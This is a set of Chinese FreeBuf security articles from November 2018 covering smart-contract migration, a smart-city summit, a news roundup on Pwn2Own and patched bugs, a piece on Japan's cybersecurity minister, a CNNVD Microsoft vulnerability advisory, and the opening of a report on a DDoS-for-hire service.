猎豹区块链安全实验室 2018-11-16 1:0 转存

智能合约是很容易受到攻击的——合约上存在的bug、用户的钱包的漏洞、或者设置上的疏忽,都会导致被攻击。如果您使用了智能合约,则必须准备好应急预案,在大多数情况下,唯一有效的解决方案是部署新的智能合约实例,并且将所有数据迁移到该实例中。

如果您计划开发可升级的智能合约,迁移过程将的最大风险是在升级机制的过程中。

本篇文章将带你了解智能合约迁移的工作原理。

您需要合约迁移功能

即使是没有任何漏洞的智能合约,用户也可能会因为私钥的丢失而被盗。在这类攻击中,即使智能合约具备了可升级的机制,也可能无法修复已部署的智能合约,因此需要部署并正确初始化合约的新实例,以便为用户恢复功能,所有开发人员必须在智能合约设计阶段就集成迁移功能,并且必须准备好折中方案进行迁移。

迁移有两个步骤:

1)恢复要迁移的数据

2)将数据写入新合约

接下来就让我们来看看细节,成本和运营方面的后果。

如何执行迁移

第1步:数据恢复

需要从区块链中的特定区块来读取数据,如果是从事件(黑客或故障)中恢复,需要在事件发生之前,使用阻止或过滤攻击者的操作。

如果可能,先暂停合约,这对用户更加透明,并防止了黑客攻击不懂迁移的用户。数据恢复将取决于您的数据结构:

对于简单类型的公共变量(例如uint或address),通过getter的检索值是微不足道的。对于私有变量,您可以依赖事件,也可以计算变量的内存偏移量,然后使用getStorageAt函数检索。由于元素的数量是已知的,因此阵列也很容易恢复。

映射的情况就有点复杂了,不存储映射的键,需要恢复它们才能访问这些值。为简化离线跟踪,我们建议在映射中存储值时发出事件。

对于ERC20智能合约来说,可以通过跟踪转移事件的地址找到所有持有者的列表,这个过程很难。

我们准备了两个方案来帮你:

首先,可以扫描区块链并自行检索持有者; 在第二种情况下,可以依赖以太网区块链公开的Google BigTable存档。

如果您不熟悉web3 API以从区块链中提取信息,则可以使用ethereum-etl,它提供了一组脚本来简化数据提取。

如果您没有同步区块链,则可以使用Google BigQuery API。

图1显示了如何通过BigQuery收集给定令牌的所有地址:

图1:使用Google BigQuery恢复地址0x41424344处令牌的所有Transfer事件中的地址

BigQuery提供对块编号的访问,因此可以调整此查询以将事务返回到特定块。

一旦恢复了所有持有者的地址,就可以离线查询balanceOf功能以恢复与每个持有者相关的余额。过滤余额为空的帐户。

现在我们知道如何检索要迁移的数据,我们就可以将数据写入新合约。

第2步:数据写入

收集数据后,就要创建新的智能合约了。

对于简单的变量,可以通过智能合约的构造函数来设置值。

如果数据无法保存在单个中,则情况会稍微复杂和昂贵。每个交易都包含在一个区块中,该区块限制了其交易可以使用的gas总量(所谓的“Gas Limit”)。如果交易的gas成本接近或超过此限制,矿工将不会再打包。因此,如果要迁移大量数据,则必须将迁移拆分为多个任务。

解决方案是在智能合约中添加初始化状态,只有所有者才能更改状态变量,用户无法执行任何操作。

对于ERC20令牌,该过程将采取以下步骤:

1)在初始化状态下部署契约,

2)迁移余额,

3)将合约的状态转移到生产状态。

4)初始化状态可以使用Pausable功能和指示初始化状态的布尔值来实现。

为了降低成本,可以使用批量传输功能实现余额的迁移,该功能允许您在单个事务中设置多个帐户:

图2:batchTransfer函数的示例

在迁移合约时,会出现两个主要问题:

迁移成本和对交易所有什么影响。

迁移成本

数据的恢复是在链外完成的,因此是免费的。Ethereum-etl可以在本地使用。谷歌的BigQuery API提供足够的免费信用来支付其使用。

但是,发送到网络的每个事务和新合约存储的每个字节都有成本。

使用图2的batchTransfer功能,转移200个账户的成本约为2.4M gas,平均gas价格(10 Gwei)的5.04美元(ETH以今天的价格计算)。粗略地说,迁移一个数据需要0.025美元

如果我们看看按市值排名的前五大ERC20代币的持有人数:

image.png

交易所

部署新合约可能会对运营产生影响。对于基于token的合约来说,在迁移期间与交换机协作非常重要,以确保将列出新合约,并且将丢弃之前的合约。

幸运的是,前面的标识迁移事件,表明交流有可能进行合作。

智能合约迁移与可升级智能合约

可升级的合约有几个缺点:

需要详细的EVM和Solidity的专业知识,基于委托调用的代理要求开发人员掌握EVM和Solidity是必要的。

增加了复杂性和代码大小,合约更难审查,更有可能会有bug和安全问题。

增加了要处理的密钥数量,合约将需要多个授权用户(所有者,升级者)。授权用户越多,攻击面越大。

每笔交易的gas费用增加。合约变得比没有升级机制的同一版本更具竞争力。

他们鼓励在部署后解决问题。如果开发人员知道无法轻松更新合约,他们往往会更彻底地测试和审查合约。

它们减少了用户对合约的信任。用户需要信任合约的所有者,这会阻止真正分散的系统。

只有在存在强有力的论据时,合约才应具有可升级机制,例如:

合约需要经常更新。如果要定期修改合约,则定期迁移的成本可能高到足以证明可升级性机制的合理性。

合约要求固定地址。合约的迁移需要使用新地址,这可能会破坏与第三方的交互(例如与其他合约的交互)。

合约迁移实现了升级带来的好处,但缺点很少。升级相对于迁移的主要优点是升级成本更低。然而,这种成本并不能证明所有的缺点。

建议

在合约部署之前准备迁移过程、使用事件来促进数据跟踪。

如果要购买可升级版的合约,则还必须准备迁移程序,因为您的密钥可能会受到损害,或者您的合约可能会遭受错误且不可逆转的操纵。

智能合约带来了新的发展模式,它们的不可变性要求用户重新思考他们构建应用程序的方式,并要求彻底的设计和开发过程。

*本文由Trailofbits团队首发于blog,由猎豹区块链安全团队翻译与编辑,转载请注明来自FreeBuf.COM

原文阅读

2018全球(银川)智慧城市峰会盛大启幕
FB客服 2018-11-16 0:21 转存

2018年11月15日上午,由银川市人民政府携手中国电子信息产业集团有限公司共同主办,中国电子国际展览广告有限责任公司承办的2018全球(银川)智慧城市峰会在美丽的塞上湖城银川隆重开幕。

本次峰会邀请了来自阿尔及利亚大使艾哈桑·布哈利法,毛里求斯大使李淼光;自治区党委副书记、银川市委书记姜志刚,中国工程院院士、中国网络安全空间协会理事长方滨兴,原国家卫生和计划生育委员会副主任、党组成员,现任中国卫生信息与健康医疗大数据学会会长、北京大学健康医疗大数据国家研究院院长金小桃,中国电子信息产业集团总经理张冬辰;市人大常委会主任左新军,市长杨玉经,市政协主席马凯;自治区有关厅局相关负责人等一千余人齐聚“智慧银川”,围绕“绿色、高端、和谐、宜居”的主题,共叙智慧城市发展思路,共商网信安全发展路径,共议智慧医疗建设痛点,共话智慧公共安全趋势,共享全球先进解决方案。

嘉宾陆续入场就座

嘉宾陆续入场就座

发展智慧城市战略 助力产业升级

智慧让城市更美好。当今世界,以互联网、物联网、大数据、信息产业为代表的信息技术革命日新月异,日益渗透到社会生活的方方面面,成为不可阻挡、不可逆转的历史潮流。作为工业化、城市化与信息化深度融合的产物,智慧城市凭借智能服务的便捷性和高效性,正成为当今世界城市发展的新理念、新模式,代表着未来城市发展的新潮流,承载着新科技改变生活的新期待,也为经济高质量发展增添新动力。

银川市委副书记、市人民政府市长、党组书记杨玉经为本次峰会做开场致辞,杨市长指出,今年以来,银川市积极抢抓智慧城市建设的机遇,把智慧银川建设作为推动城市管理、创新驱动、服务民生的主引擎,充分挖掘释放数据金矿的价值红利,瞄准智慧便民服务、智慧城市管理、大数据产业,“三大”发展方向。在顶层设计、商业模式等方式持续创新,建设了十大模块,十三个子系统,研究开发了应急指挥中心、12345一平台等16个子项目,打造了全国首家智慧产业园,38家互联网医疗企业与银川签订战略合作协议,成为全国首个互联网+医疗健康示范区的核心区。

杨市长表示,创新永无止境,相通则共进,相闭则各退。只有坚持合作共赢,才能走向共发展之路。作为一个在智慧城市建设领域的探索者、跋涉者,银川市将继续按照数字政务、智慧社会建设的总要求,坚定不移走市场化、公司化、产业化的发展道路,努力打造更富智慧的智慧城市建设银川模式,为中国新型城市发展贡献银川智慧。

作为本次峰会的主办方之一,中国电子信息产业集团有限公司总经理张冬辰在致辞中表示,中国电子作为世界五百强企业和网信产业国家队,近年来始终致力于服务国家战略需求,打造网信产业核心技术体系,同时,依托安全可靠的信息技术产业体系,与湖南、河北、福州、南京等多地方政府联合,从顶层设计入手,打通信息孤岛,结合城市具体需求,在轨道交通、公安、政务、医疗、税务等领域应用部署系统,通过数字融合及综合应用,有效提高了城市管理的精准性和安全性。

张冬辰指出,目前中国电子与银川市已建立战略合作伙伴关系,未来中国电子将全面参与银川新型智慧城市规划,建设和运营,以安全的网络体系为保障,推动物联网、云计算、大数据、人工智能、5G等新一代信息技术与相关应用落地,共同打造智慧银川,为银川实现高质量发展提供有力的支撑。

随着智慧城市建设的深化和发展,人们对各个方面的需求,特别是健康医疗的新需求越来越受到重视和关注。医疗服务、健康管理成为城市建设新热点、通过互联网、大数据、人工智能推动健康医疗新模式的建立成为智慧城市建设的重点之一。在本次峰会现场,原国家卫生和计划生育委员会副主任、党组成员,现任中国卫生信息与健康医疗大数据学会会长、北京大学健康医疗大数据国家研究院院长金小桃在致辞中指出,以人民为中心,是党的根本宗旨的体现,抓住以人为中心,从人们最重要、最关切的需求展开智能化建设,以人们最迫切需求的健康医疗相关方面的需求来建设智慧医疗,是智慧城市建设的一个重点和着力点。

对于下一步的工作重点,金小桃指出,接下来要以人民为中心,以全球数字化趋势问题和需求为导向,以政府、市场、社会联动为根本,以数据的标准、安全、规范、管理为保证,以融合创新、技术、业态、模式、成果等方面的创新为动力,以增强人民群众获得感、幸福感、安全感,卫生健康智慧医疗的新动力,以促进数据经济发展,培养健康产业成为重要支柱产业为目标,为健康中国建设,为智慧城市的发展作出贡献。

国家卫生计生委统计信息中心副主任,中国卫生信息与健康医疗大数据学会副秘书长周恭伟则在致辞中表示,信息化建设、数据与各项应用场景的变化、应用场景的限制决定推进卫生健康信息化建设和健康医疗大数据应用发展永远在路上,需要分阶段、分步骤的推进。希望通过本次论坛的举办,能够助力智慧医疗发展、助推智慧城市建设,为信息化建设、大数据应用发展作出更大贡献。

打造都市智慧生活 赋能城市管理

建设网络强国、数字中国、智慧社会是党的十九大作出的重要战略部署,是全面建成小康社会,全面建成小康社会、全面建成社会主义现代化国家的重要战略支撑。新型智慧城市建设是网络强国、数字中国、智慧社会建设的重要内容和核心动力。2018年的政府工作报告为智慧城市的发展提出了战略性方向,从新动能和“健康中国”等战略决策高度出发,明确为智慧城市持续赋能。

在本次峰会的主论坛现场,中国工程院院士方滨兴、银川市委常委、市人民政府副市长赵刚,国家卫健委统计信息中心副主任周恭伟等政府领导以及国内知名专家学者对智慧城市建设相关的信息安全,网络安全,智慧建筑,个人数据保护与数据权利归属等内容发表了各自的看法,The Center for Strategic Cyberspace + Security Science,德国(上海)KSP Jürgen Engel建筑事务所等国际知名企业高层代表从智慧城市建设中的信息战略与安全,智慧建筑等领域为与会嘉宾带来全球先进的解决方案。此外,来自中电系统、阿里巴巴、京东、亚马逊、浪潮集团等企业的高层代表,从企业的角度出发,分享了企业最新研究成果在智慧城市建设过程中的实践与经验。 

2.jpg与会嘉宾认真聆听主旨演讲内容与会嘉宾认真聆听主旨演讲内容

与会嘉宾认真聆听主旨演讲内容

值得一提的是,在本次峰会现场特设立了智慧城市展区,重点展示全球领先智慧城市成果、信息安全、智慧政务、智慧医疗等以人为本、多元普惠的解决方案和产品设备,为新产品、新技术、新解决方案提供推介平台,促进行业内的交流与合作,全方位展示科技创新对未来城市发展带来的变革。在开幕当天,各级领导相继参观了中国电子信息产业集团有限公司,国投(宁夏)大数据产业发展有限公司,东软集团股份有限公司等近50家参展企业的展区,并对展区里展示的智慧产业的新技术新成果表示充分的肯定。

新技术新成果

据了解,本次峰会将持续两天,除了14日当天的主论坛以外,为了更为立体的对智慧峰会相关领域展开思想碰撞,还将在15日举办“智慧城市建设下的医疗发展”、以及“智慧城市建设下的公共安全信息化发展”2场分论坛,让与会嘉宾共商专业领域发展之路。

创新永无止境,智慧城市建设,是城市可持续发展的需要,是信息技术发展的需要,是提高综合国力竞争的战略选择,具有重要的实践意义和创新引导作用。相信通过本次峰会的成功举办,将会为智慧城市的建设赋能,有效推动城市治理体系和治理能力现代化的提升,带动智慧产业创新发展,为产业升级增加助力,为银川实现高质量发展提供有力支撑。

原文阅读

BUF早餐铺 | Pwn2Own:Galaxy S9、iPhone X和小米Mi6成为赚取奖金的对象;Facebook再曝漏洞,可使私人信息泄露;西门子修复防火墙漏洞,确保运营商安全
Freddy 2018-11-16 0:0 转存

各位Buffer早上好,今天是2018年11月16日星期五,农历十月初九。今天的早餐铺内容有:Pwn2Own Trifecta:Galaxy S9、iPhone X和小米Mi6成为赚取奖金的对象;Facebook再曝漏洞,可使私人信息泄露;西门子修复防火墙漏洞,确保运营商安全;IDC FutureScape:2019年全球数字化转型预测;清查学生手机电脑,学校的手伸得太长了。

早餐

Pwn2Own Trifecta:Galaxy S9、iPhone X和小米Mi6成为赚取奖金的对象

Pwn2Own

在为期两天的Pwn2Own Trifecta黑客大赛上,Fluoroacetate团队通过堆栈溢出漏洞攻击三星Galaxy S9的基带组件获取了远程代码执行权限,获得50000美元的奖金。MWR实验室综合利用了五种不同的漏洞,拿下了小米6手机,赚了30000美元。当小米6手机连接到黑客控制的Wi-Fi服务器时,该团队能够强制手机的默认网络浏览器导航到恶意网站。iPhone X也未能幸免,Fluoroacetate团队通过Wi-Fi利用了浏览器的JIT漏洞,实现了沙箱逃逸和提权操作,赢下60000美元奖金。

Pwn2Own比赛由黑客自己报攻击设备。今年一共报了11项挑战:三星S9有2项,全部破解成功;iPhoneX有4项,成功2项;小米6有5项,全部破解成功;主办方还设置了华为P20Pro和Pixel2的破解目标,无人报名。[来源:threatpost]

Facebook再曝漏洞,可使私人信息泄露

Facebook再曝漏洞

Facebook报告了一个安全漏洞,可允许攻击者获取用户及其朋友的某部分个人信息,使得海量用户的隐私受到威胁。该漏洞由Imperva的网络安全研究人员发现,漏洞存在于Facebook搜索功能显示输入查询结果的方式。根据Imperva研究员Ron Masas的说法,显示搜索结果的页面包含与每个结果相关联的iFrame元素,这些iFrame的端点URL没有任何保护机制来防止跨站点请求伪造(CSRF)攻击。Facebook报告该漏洞已修复。[来源:thehackernews]

西门子修复防火墙漏洞,确保运营商安全

西门子修复防火墙漏洞,确保运营商安全

西门子公司周二发布了一系列解决方案,修复了其工业产品线中的八个漏洞。最严重的漏洞包括西门子SCALANCE防火墙产品中的跨站点脚本漏洞。该漏洞允许攻击者未经授权访问工业网络,使得运营商面临严峻风险。SCALANCE防火墙用于保护安全工业网络免受不受信任的网络流量影响,并允许以不同方式过滤传入和传出网络连接。西门子S602、S612、S623、S627-2M和V4.0.1.1之前的软件版本的SCALANCE设备受到影响。

发现该漏洞的Applied Risk的研究人员表示,攻击者可以通过制作恶意链接并欺骗管理员(登录到Web服务器)来单击该链接来执行攻击。管理员执行此操作后,攻击者可以代表管理员在Web服务器上执行命令。“如果管理员被误导访问恶意链接,集成的Web服务器就会允许跨站点脚本攻击,”Applied Risk研究员Nelson Berg在对该漏洞的分析中表示。“漏洞利用成功的话可会导致绕过防火墙提供的关键安全措施。”[来源:threatpost]

IDC FutureScape:2019年全球数字化转型预测

IDC FutureScape:2019年全球数字化转型预测

全球领先的数字化转型(DX)市场研究企业国际数据公司(IDC)于近日发布《IDC FutureScape:2019年全球数字化转型预测》(文件编号US43647118)。在今年DX预测中,IDC根据具体趋势和属性,分析出两类DX化转型群体。一类是数字化转型坚定者——正在对员工、流程和技术等成功要素实施调整;另一类是数字化转型迷茫者——尚未制定必要的企业策略来有效调整企业实现转型。IDC建立在对全球3000多家公司的广泛市场研究和调研数据之上产生了市场领先的分析理解和洞察。IDC预测,到2020年,至少有55%的组织将是数字化坚定者,他们通过新的商业模式和数字化产品与服务来改变市场,重塑未来。[来源: 安全内参]

清查学生手机电脑,学校的手伸得太长了

20181115_064903_418.png

这几天,一份桂林电子科技大学下发的涉及“全面清查在校师生手机、电脑、移动硬盘”等内容的通知引发热议,不少网友认为清查行为涉嫌侵犯隐私。桂林电子科技大学保卫处工作人员介绍,目前该文件中的内容还没有具体落实。广西壮族自治区教育厅高教处一名工作人员表示,教育厅正在关注事件进展,已与涉事学校对接,目前还没有具体处理结果。

据报道,桂林电子科大下发的《关于开展清理涉暴、涉恐、反动、淫秽等违禁、违法音视频工作的通知》第一条明确,此项清查、清理工作的范围及内容为“各单位、学院要对全体教职员工、在校学生的手机、电脑、移动硬盘、U盘等存储介质进行全面清查”。有人据此认为,清查师生的手机、电脑也有一定合理性,诸如不让学生受淫秽违禁内容影响,但是,任何清查必须以遵守法律法规为前提,如果违反了法律法规,所谓“合理性”也就无从谈起。[来源:ithome]

*Freddy编译整理,转载请注明来自FreeBuf.COM

原文阅读

日本网络安全部长从来没用过电脑,甚至不知道USB是什么
shidongqi 2018-11-15 14:19 转存

我们经常说“专业的人做专业的事”,而日本一个表示没用过电脑,甚至不知道USB是什么的人却已经成为了网络安全部长,并且他将负责2020年东京奥运会网络安全的准备工作。

不知道国际奥组会对此作何感想……

2018年10月2日,日本安倍晋三任命樱田义孝出任网络安全与奥运会部长。而在11月14日,这位新升职的部长就出了大糗。在问答环节,樱田义孝被问到“你自己使用过电脑吗?”

121.jpg

作为现任的网络安全部长,樱田义孝的回答却让人震惊:电脑相关的操作我一般都指示职员来做,所以自己并没有用过电脑。

随即现场一片哄笑,作为一个安全部长负责管理国家网络安全的相关工作,甚至还将负责2020年东京奥运会的网络安全准备工作,却是一个从来没有使用过电脑的人在主导。

拥有这种顾虑的当然不只是我们,当场提问的议员就提出了质疑:“让一个没有用过电脑的人来制定网络空间安全对策,就我认为是难以置信的”。

而樱田义孝则表示,网络安全工作需要的是利用整个国家的力量,而不仅仅是自己的团队。现场貌似多数人对他的回答不太感冒,引起了一阵哄笑。

WX20181115-210921@2x.png

有了这样的开头,似乎现场有更多的人像知道这位部长对计算机的了解究竟是什么地步。在探究日本核电站的安全性问题上,于是有了以下的对话。

议员:日本的核电站里有没有USB闪存?

樱田义孝:基本来说不使用。

议员:我是问有没有,不是用不用?

樱田义孝:我的意思是不许用。

议员:不好意思请问一下,你知道USB插孔是什么吗?不是什么不许使用的东西吧?

樱田义孝:就算是有……也会做好完全的准备。

该议员似乎已经觉察到,这位部长似乎对USB的理解存在问题,便开始以伊朗纳坦兹核设施的震网病毒事件为例,解释了通过USB散播病毒的危害,顺便也“描述”了下USB闪存是个什么东西“USB闪存是如徽章一般大小,插一下,病毒就可能感染了”。

123.jpg

对此,樱田义孝也袒露了自己对USB的理解:要用的时候,就是把它插到洞里。

笔者想说的是,现在正拿着手机打《王者荣耀》的小学生,估计都能说上来USB究竟是什么。

zbSmDvP5_VZYDwYFAVI3SymY0wBjIIEiXakCj12pAo8.jpeg

其实类似这样的尴尬场面,樱田义孝已经不是头一次遭遇。就在安倍晋三刚刚任命其为奥运大臣的时候,他也遭遇一连串的提问,基本都没能答上来。他自己也表示:“我自己也不清楚为什么会选中我来做这份工作。 可能是首相认为我是一名合适的人选吧。”

而当被问到“什么事奥运会的理念?”樱田义孝支吾了片刻,看了下准备好的资料脱口而出:“人与人相互理解,共同向着美好未来努力……

Japans-Prime-Minister-Shinzo-Abe.jpg

这里,我再一次的想知道,国际奥组会在对各国奥运大臣的任命上有没有一丁点的权利去干涉?各位心里肯定有和我一样的疑问:樱田义孝是怎样做到今天这个地位的?在这个职位上还能坐几天?

还是那句老话,专业的人做专业的事。你会接受一个眼科医生来给你做心脏手术吗?当今世界,网络安全之于一个企业、一个国家的重要性不言而喻,企业在挑选合适人才的时候尚且要经过层层考核,一个国家的网络安全部长又是怎样挑选出一个连电脑都没有用过的人去承担。类似这样的闹剧,可能依然存在部分企业之中,终有一天会尝到苦果。

timg.jpeg

对了,我也想考一下各位:USB是什么?评论区留言,看看有没有不及格来混黑客……

*本文作者:Andy.i,转载请注明来自FreeBuf.COM

原文阅读

CNNVD关于微软多个安全漏洞的通报
CNNVD 2018-11-15 9:14 转存

前言

近日,微软官方发布了多个安全漏洞的公告,包括Microsoft Internet Explorer 安全漏洞(CNNVD-201811-349、CVE-2018-8570)、Microsoft Word 安全漏洞(CNNVD-201811-387、CVE-2018-8539)、(CNNVD-201811-388、CVE-2018-8573)等多个漏洞。成功利用上述安全漏洞的攻击者,可以在目标系统上执行任意代码。微软多个产品和系统受漏洞影响。目前,微软官方已经发布补丁修复了上述漏洞,建议用户及时确认是否受到漏洞影响,尽快采取修补措施。

微软多个安全漏洞

一、漏洞介绍

本次漏洞公告涉及Microsoft Internet Explorer 、Microsoft Outlook 、Microsoft Word 、Microsoft Excel 、Microsoft Project 、Microsoft JScript、Microsoft SharePoint 、Microsoft PowerShell、Windows TFTP 服务器、Chakra 脚本引擎、Windows 内核、Microsoft Dynamics 365等Windows平台下应用软件和组件。漏洞详情如下:

1、Internet Explorer 安全漏洞(CNNVD-201811-349、CVE-2018-8570)

漏洞简介:

Internet Explorer部分版本存在远程代码执行漏洞,当Internet Explorer不正确地访问内存中的对象时,可触发该漏洞。成功利用该漏洞的攻击者可以获得与当前用户相同的用户权限。

2、 Microsoft Outlook 安全漏洞(CNNVD-201811-376、CVE-2018-8522)、(CNNVD-201811-378、CVE-2018-8524)、(CNNVD-201811-377、CVE-2018-8576)、(CNNVD-201811-379、CVE-2018-8582)

漏洞简介:

当 Microsoft Outlook 软件无法正确处理内存中的对象时,就会触发该漏洞。攻击者可以向目标系统发送经过特殊设计的文件,从而在当前用户权限下执行恶意代码。

3、Microsoft Word 安全漏洞(CNNVD-201811-387、CVE-2018-8539)、(CNNVD-201811-388、CVE-2018-8573)

漏洞简介:

当 Microsoft Word 软件无法正确处理内存中的对象时,就会触发该漏洞。攻击者必须诱使用户使用Microsoft Word打开经特殊设计的文件,才能利用此漏洞。成功利用此漏洞的攻击者可以在当前用户权限下执行恶意代码。

4、Microsoft Excel 安全漏洞(CNNVD-201811-385、CVE-2018-8574)、(CNNVD-201811-386、CVE-2018-8577)

漏洞简介:

当 Microsoft Excel 软件无法正确处理内存中的对象时,就会触发该漏洞。攻击者必须诱使用户使用 Microsoft Excel 打开经特殊设计的文件,才能利用此漏洞。成功利用此漏洞的攻击者可以在当前用户权限下执行恶意代码。

5、 Microsoft JScript 安全漏洞(CNNVD-201811-360、CVE-2018-8417)

漏洞简介:

Microsoft JScript 中存在可能允许攻击者绕过 Device Guard 的安全功能的漏洞,攻击者通过访问本地计算机,然后运行经特殊设计的应用程序从而创建任意 COM 对象。

6、 Windows Search 安全漏洞(CNNVD-201811-362、CVE-2018-8450)

漏洞简介:

如果Windows Search无法正确处理内存中的对象,就会触发该漏洞。攻击者需要向Windows Search 服务发送经特殊设计的消息,从而执行恶意文件。

7、Microsoft PowerShell安全漏洞(CNNVD-201811-347、CVE-2018-8256)、(CNNVD-201811-358、CVE-2018-8415)

漏洞简介:

如果Microsoft PowerShell无法正确处理内存中的对象,可能就会触发该漏洞。攻击者可以向目标系统发送经过特殊设计的文件,从而执行恶意文件。

8、Microsoft SharePoint 权限提升漏洞(CNNVD-201811-382、CVE-2018-8568)、(CNNVD-201811-383、CVE-2018-8572)

漏洞简介:

当 Microsoft SharePoint Server 没有正确地处理发往SharePoint 服务器的 Web 请求时,就会触发该漏洞。经过身份验证的攻击者可能通过向受影响的 SharePoint 服务器发送经特殊设计的请求来利用此漏洞,从而执行恶意文件。

9、Microsoft Project 安全漏洞(CNNVD-201811-371、CVE-2018-8575)

漏洞简介:

当 Microsoft Project 软件无法正确处理内存中的对象时,就会触发该漏洞。攻击者可能通过向用户发送经特殊设计的文件并诱使用户打开,从而执行恶意代码。

10、Windows 内核信息泄漏漏洞(CNNVD-201811-355、CVE-2018-8408)

漏洞简介:

当 Windows 内核不正确地处理内存中的对象时会触发该漏洞。成功利用此漏洞的攻击者可以获取信息,从而进一步入侵用户系统。已经过身份验证的攻击者可以通过运行经特殊设计的应用程序来利用此漏洞。

11、Windows TFTP 服务器安全漏洞(CNNVD-201811-341、CVE-2018-8476)

漏洞简介:

Windows 部署服务 TFTP 服务器在处理内存中的对象时存在远程代码执行漏洞。攻击者可以创建经特殊设计的请求,提升 Windows 权限,从而执行恶意代码。

12、Chakra 脚本引擎安全漏洞(CNNVD-201811-338、CVE-2018-8541)、(CNNVD-201811-339、CVE-2018-8542)、(CNNVD-201811-390、CVE-2018-8543)(CNNVD-201811-340、CVE-2018-8551)、(CNNVD-201811-342、CVE-2018-8555)、(CNNVD-201811-345、CVE-2018-8556)、(CNNVD-201811-346、CVE-2018-8557)、(CNNVD-201811-348、CVE-2018-8588)

漏洞简介:

Chakra 脚本引擎在 Microsoft Edge 中处理内存中的对象的时可能触发该漏洞。成功利用该漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理权限登录,攻击者便可以任意安装程序、查看、更改或删除数据。

13、Windows 权限提升漏洞(CNNVD-201811-373、CVE-2018-8592)

漏洞简介:

如果在系统上使用物理介质(USB、DVD 等)安装程序,并在安装过程中选择了“不保留任何内容”选项,就会触发Windows 10 版本 1809 中的权限提升漏洞。成功利用此漏洞的攻击者可以在受影响系统上获得本地访问权限。

14、Microsoft Dynamics 365版本8安全漏洞(CNNVD-201811-396、CVE-2018-8609)

漏洞简介:

当Dynamics服务器无法正确清理Web请求时,就会触发该漏洞。经过身份验证的攻击者可以通过向目标Dynamics服务器发送特殊构造的请求来利用此漏洞,从而在目标服务器上执行恶意代码。

二、 修复建议

目前,微软官方已经发布补丁修复了上述漏洞,建议用户及时确认漏洞影响,尽快采取修补措施。微软官方链接地址如下:

序号 漏洞名称 官方链接
1 Microsoft  Internet Explorer 安全漏洞(CNNVD-201811-349、CVE-2018-8570) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8570
2 Microsoft  Outlook 安全漏洞(CNNVD-201811-376、CVE-2018-8522)、(CNNVD-201811-378、CVE-2018-8524)、(CNNVD-201811-377、CVE-2018-8576)、(CNNVD-201811-379、CVE-2018-8582) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8522https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8524 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8576https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8582
3 Microsoft  Word 安全漏洞(CNNVD-201811-387、CVE-2018-8539)、(CNNVD-201811-388、CVE-2018-8573) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8539https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8573
4 Microsoft  Excel安全漏洞(CNNVD-201811-385、CVE-2018-8574)、(CNNVD-201811-386、CVE-2018-8577) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8574https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8577
5 Microsoft  JScript 安全漏洞(CNNVD-201811-360、CVE-2018-8417) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8417
6 Windows  Search 安全漏洞(CNNVD-201811-362、CVE-2018-8450) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8450
7 Microsoft  PowerShell 安全漏洞(CNNVD-201811-347、CVE-2018-8256)、(CNNVD-201811-358、CVE-2018-8415) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8256https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8415
8 Microsoft  SharePoint 权限提升漏洞(CNNVD-201811-382、CVE-2018-8568)、(CNNVD-201811-383、CVE-2018-8572) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8568https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8572
9 Microsoft  Project 安全漏洞(CNNVD-201811-371、CVE-2018-8575) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8576
10 Windows  内核信息泄漏漏洞(CNNVD-201811-355、CVE-2018-8408) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8408
11 Windows  TFTP 服务器安全漏洞(CNNVD-201811-341、CVE-2018-8476) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8476
12 Chakra  脚本引擎安全漏洞(CNNVD-201811-338、CVE-2018-8541)、(CNNVD-201811-339、CVE-2018-8542)、(CNNVD-201811-390、CVE-2018-8543)(CNNVD-201811-340、CVE-2018-8551)、(CNNVD-201811-342、CVE-2018-8555)、(CNNVD-201811-345、CVE-2018-8556)、(CNNVD-201811-346、CVE-2018-8557)、(CNNVD-201811-348、CVE-2018-8588) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8541https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8542 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8543https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8551 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8555https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8556 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8557https://portal.msrc.microsoft.com/zh-CN/security-guid ance/advisory/CVE-2018-8588
13 Windows 权限提升漏洞(CNNVD-201811-373、CVE-2018-8592) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8592
14 Microsoft Dynamics 365版本8安全漏洞(CNNVD-201811-396、CVE-2018-8609) https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-8609

CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。

*本文作者:CNNVD,转载请注明来自FreeBuf.COM

原文阅读

基于Bushido的DDoS服务只需要几美元就能打垮一个网站
Alpha_h4ck 2018-11-15 7:0 转存

前言

近期,来自FortiGuard实验室的安全研究专家发现了一个名叫“0x-booter”的DDoS即服务平台,这个平台虽然代码架构不优秀,但是功能却非常强大,而且还提供了易于使用的用户接口。

DDoS

“0x-booter”首次出现在大家眼前是2018年10月17日,根据当时Facebook上的一条广告,这个平台能够提供超过500Gbps的攻击流量和20000多个bot。

